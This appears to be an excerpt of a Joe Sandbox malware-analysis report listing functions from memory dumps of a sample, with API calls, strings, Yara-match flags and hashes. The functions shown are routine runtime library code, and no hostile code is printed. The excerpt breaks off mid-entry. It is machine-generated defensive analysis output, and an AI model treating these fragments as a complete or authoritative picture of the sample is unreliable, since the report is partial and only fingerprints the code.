Function 0248EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D

Strings

advapi32.dll, xrefs: 0248EEF3, 0248EEF8, 0248EF14

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 38840c7213b1f9bc860e98fb0ddd366cafa539f947be498571399ad82e86b70b
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 2E218EB1914751BFE7107FA4DC08A5ABBECEF05B16F004A2BF555E3640CBBC94418BA8

Function 024824A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
GetProcAddress.KERNEL32(00000000), ref: 02482507
GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
__CxxThrowException@8.LIBVCRUNTIME ref: 02482552

Strings

kernel32.dll, xrefs: 024824B0, 024824B5, 024824FA

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: 64c3c52ceab967ea1986fba65a5ecdcf1e2e5302cd2743fb97272074f9df90ec
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: E711C2759103517FE710BBB5AC59A6F3BECDE06B12720052BB801E2291EBB8D5008A6C

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

switchState, xrefs: 00424882
pContext, xrefs: 00424946

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 02490C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02490C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02490C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02490CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02490D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02490D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02490D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02490D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02490D80
__CxxThrowException@8.LIBVCRUNTIME ref: 02490DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02490DBC

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: 299487b525ae075706d47c35fb448070024d7cbc4596ec6adf551d963ab329b9
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: CC41B230A142489BDF19FFA5C4547FD7BA6AF42304F14406FD8166B382CB659A09CF65

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 024A204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024A2061

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024A206D
_free.LIBCMT ref: 024A2078
_free.LIBCMT ref: 024A2083
_free.LIBCMT ref: 024A208E
_free.LIBCMT ref: 024A2099
_free.LIBCMT ref: 024A20A4
_free.LIBCMT ref: 024A20AF
_free.LIBCMT ref: 024A20BA
_free.LIBCMT ref: 024A20C8

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 50f597ad08e1649174e4b31d26c983b551346de7ec64346999a12fc7123fd680
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 8F117476600508AFCB51EF5AC851CD93FA6EF14790B5140AABE098F221EB71EE609F80

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E229, 0042E1C0
F(@, xrefs: 0042E25E, 0042E1CC, 0042E261

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

exp, xrefs: 0043EF8A, 0043EFEC
log10, xrefs: 0043EF0F, 0043EF5F
acos, xrefs: 0043F03D
log, xrefs: 0043EF6B, 0043EF77
sqrt, xrefs: 0043F049
pow, xrefs: 0043EFA9, 0043F055, 0043F068
asin, xrefs: 0043F031

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 024A3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: 34582cfed4f7afd47f8a04efedb635044b3869a79fde31d04e057d8cd1e16a32
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: DCC1C070E04349AFDF12DFADC850BAEBFB1AF1A304F04419AE414AB391E7749941CB61

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
PMDtoOffset.LIBCMT ref: 00428D4F

Strings

Bad dynamic_cast!, xrefs: 00428D91

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

Function 0248C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0248C6DC
atomic_compare_exchange.LIBCONCRT ref: 0248C700
std::_Cnd_initX.LIBCPMT ref: 0248C711
std::_Cnd_initX.LIBCPMT ref: 0248C71F

Part of subcall function 02471370: __Mtx_unlock.LIBCPMT ref: 02471377

std::_Cnd_initX.LIBCPMT ref: 0248C72F

Part of subcall function 0248C3EF: __Cnd_broadcast.LIBCPMT ref: 0248C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0248C73D

Strings

t#D, xrefs: 0248C6C2

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: f569ce9ec2b7a229be66d557a78a16237813ca616791f7b0fe54a863ae9fede2
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 1101F771910605ABDB15B7B6CDC4BDEB35EAF00310F54001BE91597680DBB4AA158FA2

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 024A1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

_free.LIBCMT ref: 024A1444
_free.LIBCMT ref: 024A145D
_free.LIBCMT ref: 024A148F
_free.LIBCMT ref: 024A1498
_free.LIBCMT ref: 024A14A4

Strings

C, xrefs: 024A1291

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 5116b0abada86bb7d165f5444f58669002a187c5d5234c72b7cf3bd9fb6791e7
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 2DB12775A012299FDB24DF18C894BAEB7B5FB18304F1445AED84DA7390E770AE90CF40

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 024AA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AA184
_free.LIBCMT ref: 024AA192
_free.LIBCMT ref: 024AA2C0
_free.LIBCMT ref: 024AA2CB

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 98b794772e495da6d9d74359f85992a6912aa08e5e2d37ba04da51f5fbb31c89
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: D061D272900215AFDB20CFA9C851B9ABBF6FF59710F2441ABE844EB341E771A991CB50

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 024A3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0249C4A4,E0830C40,?,?,?,?,?,?,024A425F,0247E03C,0249C4A4,?,0249C4A4,0249C4A4,0247E03C), ref: 024A3B2C
__fassign.LIBCMT ref: 024A3BA7
__fassign.LIBCMT ref: 024A3BC2
WideCharToMultiByte.KERNEL32(?,00000000,0249C4A4,00000001,?,00000005,00000000,00000000), ref: 024A3BE8
WriteFile.KERNEL32(?,?,00000000,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C07
WriteFile.KERNEL32(?,0247E03C,00000001,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C40

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: 84bc4c91e45cf4b55f8d9e45d862e0fafb45de2b319ebaeded20b911245305d8
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: D351E575A00208AFDB10CFA8DC94AEEBBF5EF19700F14415FE555E7291E7309A81CB60

Function 02494AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02494ACD

Part of subcall function 02494D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02494800), ref: 02494DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02494AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 02494AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02494B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 02494BC3

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 27807ad9f185a068bac2a013616ef9592b8f6e11a618ce762696f387e6df2841
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 4331B439A002149BCF04EF69C885B6E7BB6FF44714F20456BD9259B381DB70EA06CB94

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

